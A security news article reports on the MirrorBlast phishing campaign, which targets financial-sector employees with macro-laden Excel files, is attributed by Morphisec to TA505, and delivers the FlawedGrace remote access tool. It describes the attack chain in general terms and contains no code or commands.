Researchers warn about a new phishing attack targetting employees in financial services, using a poisoned Excel file.
This Phishing Attack Uses An Infected Excel File That Can Avoid Detection
The MirrorBlast phishing campaign was first spotted by cybersecurity firm ET Labs in early September. Later, security firm Morphisec has examined the malware and warned that poisoned Excel files contain “extremely lightweight” embedded macros that could help them circumvent malware-detection systems.
Macros are scripts for automating tasks and have gained decent popularity among cybercrooks. While macros are disabled by default in Excel, the bad guys social engineering tactics to trick targets into enabling them.
Macros’ efficiency is the reason why government-backed hacking groups have been using them. Earlier this year, Microsoft expanded its Antimalware Scan Interface (AMSI) for antivirus to combat the surge in macro malware and a new trend in which hackers use legacy Excel 4.0 XLM macros, instead of more recent VBA macros.
MirrorBlast – The Work Of Russian Hackers?
Morphisec pointed out that the attack chain resembles methods used by a known Russia-based hacking group tracked by researchers as TA505. The cybercriminal gang has been active since 2014 and is known to use a wide array of tools in their attacks.
“TA505 is most known for frequently changing the malware they use as well as driving global trends in malware distribution,” Morphisec researcher Arnold Osipov writes in a recent blog post.
“The attack chain of the infection bears a similarity to the tactics, techniques, and procedures commonly used by the allegedly Russia-based threat group TA505. The similarities extend to the attack chain, the GetandGo functionality, the final payload, and similarities in the domain name pattern”.
The attack starts with an Excel file attached to an email and then uses a Google feed proxy URL with a SharePoint and OneDrive bait that claims to be a file share request. By clicking the link, the target is redirected to a compromised SharePoint site or a fake OneDrive site. Both versions use that same weaponized Excel file.
Attackers Are Still Taking Advantage of the COVID-19 Context
The phishing email used in the campaign exploits the theme of company-issued COVID-related information regarding changes to working arrangements.
Researchers explained that the macro code could be executed only on a 32-bit version of Office because of compatibility issues with ActiveX objects. The macro bypasses sandboxing by executing a JavaScript that checks if the computer is run in administrator mode. Then, it launches a process called msiexec.exe that downloads and installs an MSI package.
Morphisec discovered two versions of the MSI installer that exploited legitimate scripting tools KiXtart and REBOL.
The KiXtart script sends the victim’s computer information, such as the domain, computer name, user name, and process list, to the hacker’s command-and-control server. Then, it responds with a number instructing whether or not to proceed with the REBOL script.
Morphisec noted that the REBOL version leads to a widely used remote access tool called FlawedGrace.
“TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals,” Osipov notes.
Morphisec concluded by saying that attackers are increasingly focusing on evading detection, and more robust defenses are needed.
“The ability of the MirrorBlast attack to have very low detections in VirusTotal is also indicative of the focus most groups have on evading detection-centric solutions. Yet again, it is clear that the market’s reliance on detection and response leaves them open to more attacks than it resolves. A new way forward is needed”.
Sources:
ZDNet This new phishing attack features a weaponized Excel file
Morphisec EXPLOSIVE NEW MIRRORBLAST CAMPAIGN TARGETS FINANCIAL COMPANIES
Attribution:
Feature Image: Cards photo created by freepik – www.freepik.com
